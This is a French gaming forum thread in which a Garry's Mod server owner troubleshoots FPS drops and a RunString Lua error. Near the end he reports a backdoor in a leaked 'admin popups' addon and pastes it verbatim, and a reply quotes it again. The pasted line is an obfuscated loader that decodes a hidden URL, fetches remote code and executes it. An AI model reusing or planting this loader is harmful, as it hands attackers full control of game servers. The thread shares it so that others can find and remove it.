Problèmes de FPS

• Initiateur de la discussion Membre supprimé 88305
  • Date de début
  • Initiateur de la discussion
M

Membre supprimé 88305

Anonyme
Bonsoir,

Tous nos joueurs rencontrent de nombreuses chutes de FPS sur notre serveur, parfois même le jeu Garry's Mod crash et nous perdons 3-6 joueurs d'un coup en "Timed out" (cela m'ai déjà arrivé sur le serveur). Aussi dès que nous atteignons les 25-45 connectés (ce qu'on fait habituellement) les FPS sont tout le temps vers 30 tout le temps et pour tout le monde. Le tickrate est à 15.

J'ai déjà optimisé le serveur côté WorkShop, ainsi que côté addons. J'ai limité le nombre de Props (30 par personne). Mon serveur n'utilise pas de leaks, tous les addons viennent de scriptfodder (maintenant gmodstore). Snk m'avais recommandé d'optimiser au niveau des voitures (ce que j'ai fait), je n'utilise majoritairement les TDM Cars. J'ai aussi lu que les addons food mod, bank vault etc.. faisaient bug le serveur. J'ai donc supprimé le food mod, par contre j'utilise encore bank vault, est-ce-grave ? J'ai aussi essayé de corriger le plus d'erreurs LUA possible.
Néanmoins il en reste une que je ne comprend pas :

[ERROR] RunString:1: unexpected symbol near '<'
1. unknown - RunString:0

Je ne sais pas du tout d'ou elle vient.

Si quelqu'un pourrait m'aider à résoudre ces crashs clients ou ces chutes de FPS ou tout simplement FPS bas constant ce serait vraiment sympa, merci !

Bonne soirée, en attendant des réponses :c !

• J'aime
Réactions: Erwann Fox
Amelisse

Amelisse

Geek suprême
Score réaction
50
Hello,
tu as quoi comme machine ?

Envoi l'ip du serveur

AyZenSantos

AyZenSantos

Psychopathe
Score réaction
753
J'ai la meme error que toi donc qi qielqu'un sais je suis preneur :)

M

Membre supprimé 88305

Anonyme
Amelisse à dit:
Hello,
tu as quoi comme machine ?

Envoi l'ip du serveur
J'ai la machine 64 Slots chez MtxServ
IP : gmod21.mtxserv.fr:27210

Amelisse

Amelisse

Geek suprême
Score réaction
50
Je rejoint

M

Membre supprimé 88305

Anonyme
Puis j'ai aussi des scripts error partout côté client. Comme quand on tire avec les M9K et cette erreur DarkRP :

[DarkRP] gamemodes/darkrp/entities/weapons/stunstick/shared.lua:26: attempt to call global 'Sound' (a string value)
1. unknown - gamemodes/darkrp/entities/weapons/stunstick/shared.lua:26

M

Membre supprimé 88305

Anonyme
@Amelisse Ducoup ya moyen que tu m'aides à régler ça ou pas stp ? ^^

Si tu veux tu peux venir sur le teamspeak du serveur : 51.255.115.76:11225

Merci :)

Feytone

Feytone

Chuck Norris
Score réaction
1 301
Juste pour info, les m9k ça commence sérieusement à être pété...

• J'aime
Réactions: Mamadou Trug, Yoh Sambre ♪ et Erwann Fox
Amelisse

Amelisse

Geek suprême
Score réaction
50
HitSploit à dit:
@Amelisse Ducoup ya moyen que tu m'aides à régler ça ou pas stp ? ^^

Si tu veux tu peux venir sur le teamspeak du serveur : 51.255.115.76:11225

Merci :)
Je suis sur ton ts

estebandu44

estebandu44

Geek suprême
Score réaction
108
Salut, j'ai eu ce même soucis sur mon serveur local, donc ça dérange moins, cette erreur est apparue à quel moment ? Quel addon tu as ajouté avant que cette erreur intervienne ?

M

Membre supprimé 88305

Anonyme
@estebandu44 Le problème est qu'elle est apparue juste après le redémarrage automatique à 2h du matin. J'ai rajouté les bitminers 2 ainsi que son content et une voiture. J'ai essayé de supprimer ces derniers mais pourtant l'erreure est toujours présente.

estebandu44

estebandu44

Geek suprême
Score réaction
108
HitSploit à dit:
@estebandu44 Le problème est qu'elle est apparue juste après le redémarrage automatique à 2h du matin. J'ai rajouté les bitminers 2 ainsi que son content et une voiture. J'ai essayé de supprimer ces derniers mais pourtant l'erreure est toujours présente.
T'as essayé de mettre une ancienne sauvegarde automatique à partir de ton panel d'administration ?

AntoineLive

AntoineLive

Geek suprême
Score réaction
101
L'erreur concerne une fonction RunString et elle arrive quand elle ne comprend pas l'argument qu'on lui donne.

RunString permet d'executer du code Lua à partir d'une variable string.

Cette fonction se trouve généralement:
- Dans les DRM pour sécuriser un addon et empêcher le leak
- Dans les leaks, et il s'agit d'un virus.

Dans le premier cas, il fait chercher l'addon responsable et contacter le propriétaire pour qu'il règle.

Dans le deuxième cas, trouve vite l'addon et supprime le car la personne qui en est à l'origine a un contrôle total de ton serveur.
(Il peux injecter le code qu'il veut)

M

Membre supprimé 88305

Anonyme
Bonsoir, (désolé de bump un sujet qui date de plus de 2 mois mais j'en ai besoin là)

Au niveau des scripts errors tout est réglé cela venait d'un addon de gscript qui n'était plus update enfin bref..

@AntoineLive Merci de ta réponse complète, pour le runstring j'imagine donc que tu as raison puisque c'est ce que j'ai lu aussi ailleurs. Je pense aussi que c'est peut-être une backdoor à la GBackdoor ou autre...
Penses-tu que si c'est une backdoor comme tu le dis nomalua pourrait la trouver ? Car j'imagine que si le code de la backdoor est obfusqué nomalua n'y verra rien ? Sinon comment la trouver ?

En attendant ta réponse.

Merci

Dernière modification par un modérateur:
Mamadou Trug

Mamadou Trug

Geek suprême
Score réaction
39
Feytone à dit:
Juste pour info, les m9k ça commence sérieusement à être pété...
Ptdrrr grave vive les FAS ! BrokeBack

Feytone

Feytone

Chuck Norris
Score réaction
1 301
Mamadou Trug à dit:
Ptdrrr grave vive les FAS ! BrokeBack
Ou pas CW2:0
Les FAS ne sont plus mises à jour comparées aux CW2:0

Mamadou Trug

Mamadou Trug

Geek suprême
Score réaction
39
Feytone à dit:
Ou pas CW2:0
Les FAS ne sont plus mises à jour comparées aux CW2:0
C'est quoi ça ? x)

Feytone

Feytone

Chuck Norris
Score réaction
1 301
Mamadou Trug à dit:
C'est quoi ça ? x)
Beh ce sont les FAS en mieux (par la même personne). FAS c'est dépassé, là au moins t'as des nouvelles armes !

Mamadou Trug

Mamadou Trug

Geek suprême
Score réaction
39
Feytone à dit:
Beh ce sont les FAS en mieux (par la même personne). FAS c'est dépassé, là au moins t'as des nouvelles armes !
Je vais aller voir :)

Mamadou Trug

Mamadou Trug

Geek suprême
Score réaction
39
Feytone à dit:
Ouais mais mec c'est même pas des packs d'armes chaques addons est une arme c'est chaud mec y'aurais 250 addons dans ma collection sinon ;)

• J'aime
Réactions: Feytone
Feytone

Feytone

Chuck Norris
Score réaction
1 301
Mamadou Trug à dit:
Ouais mais mec c'est même pas des packs d'armes chaques addons est une arme c'est chaud mec y'aurais 250 addons dans ma collection sinon ;)
Boh ça change rien... Et Rinic Pack sort un maximum d'armes en 2-3 packs.

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 688
M9k = LOOOOOL PVP
CSS SOURCE = j'existe...voilà voilà..
FAS = JE DÉFONCE TES OREILLES HAHA! (sérieusement a l'époque de la hype FAS j'avais la tête douloureuse a cause des gang qui h24 tiré dans evilmelon ou downtown...)

M

Membre supprimé 88305

Anonyme
Bonsoir,

Si quelqu'un pouvais m'aider s'il vous plait au niveau de cette erreur :

[ERROR] RunString:1: unexpected symbol near '<'
1. unknown - RunString:0

C'est certainement une backdoor, j'ai effectué un nomalua scan, si quelqu'un pouvait me dire ce qu'il en pense et ce qu'il trouve suspect ce serait super svp.
Voila le pastebin du nomalua output : https://pastebin.com/UiBW1RuY

Merci, j'attends votre aide :3

- HitSpoit

M

Membre supprimé 88305

Anonyme
C'est réglé, pour ceux qui ont le même problème ça peut peut-être venir du même addon donc de la même backdoor que moi.

La backdoor se trouvait dans l'addons admin popups.
Pour ma part elle était dans le fichier sh_adminpopups.lua elle était ligne 141.
Ligne de la backdoor (code obfusqué) :
hook.Add("Think","CCC", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if !data then return end data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c) end)) end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL2NjL3JmLmF5bm90ZS8vOnB0dGg=')),function(body,len,headers,code) RunString(body) end)") hook.Remove("Think","CCC") end)

J'espère que ça a réglé le problème de certaines personnes.

Bonne soirée

-HitSploit

• Banni
Keeta

Keeta

Geek suprême
Score réaction
87
HitSploit à dit:
C'est réglé, pour ceux qui ont le même problème ça peut peut-être venir du même addon donc de la même backdoor que moi.

La backdoor se trouvait dans l'addons admin popups.
Pour ma part elle était dans le fichier sh_adminpopups.lua elle était ligne 141.
Ligne de la backdoor (code obfusqué) :

hook.Add("Think","CCC", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if !data then return end data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c) end)) end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL2NjL3JmLmF5bm90ZS8vOnB0dGg=')),function(body,len,headers,code) RunString(body) end)") hook.Remove("Think","CCC") end)

J'espère que ça a réglé le problème de certaines personnes.

Bonne soirée

-HitSploit
Alors tu viens d'avouer que tu as leaks admin popups c'est triste

M

Membre supprimé 88305

Anonyme
@Keeta A partir du moment ou je l'ai acheté mais qu'il n'y avait 0 support j'ai litige donc en effet j'ai leak quand la dernière version est sortie.

Est-ce-un crime puisque que je l'avais acheté ? Certainement mais moins que si je ne l'avais pas acheté du tout.

Enfin bref sur ce bonne journée, je faisais ça pour aider donc il serait sympa d'arrêter de te déchaîner sur les membres sans raison.

Feytone

Feytone

Chuck Norris
Score réaction
1 301
HitSploit à dit:
@Keeta A partir du moment ou je l'ai acheté mais qu'il n'y avait 0 support j'ai litige donc en effet j'ai leak quand la dernière version est sortie.

Est-ce-un crime puisque que je l'avais acheté ? Certainement mais moins que si je ne l'avais pas acheté du tout.

Enfin bref sur ce bonne journée, je faisais ça pour aider donc il serait sympa d'arrêter de te déchaîner sur les membres sans raison.
Beh t'étonnes pas de backdoors sur un leak...
Je crois que cet addon a toujours bien fonctionné.

M

Membre supprimé 88305

Anonyme
@Feytone C'est mon seul leak dans tous les cas donc bon.
Et puis je ne suis pas étonné c'est pour ça que j'ai trouvé direct je suis d'abord allez voir mon seul leak.

Discord d'entraide
Rejoignz-nous sur Discord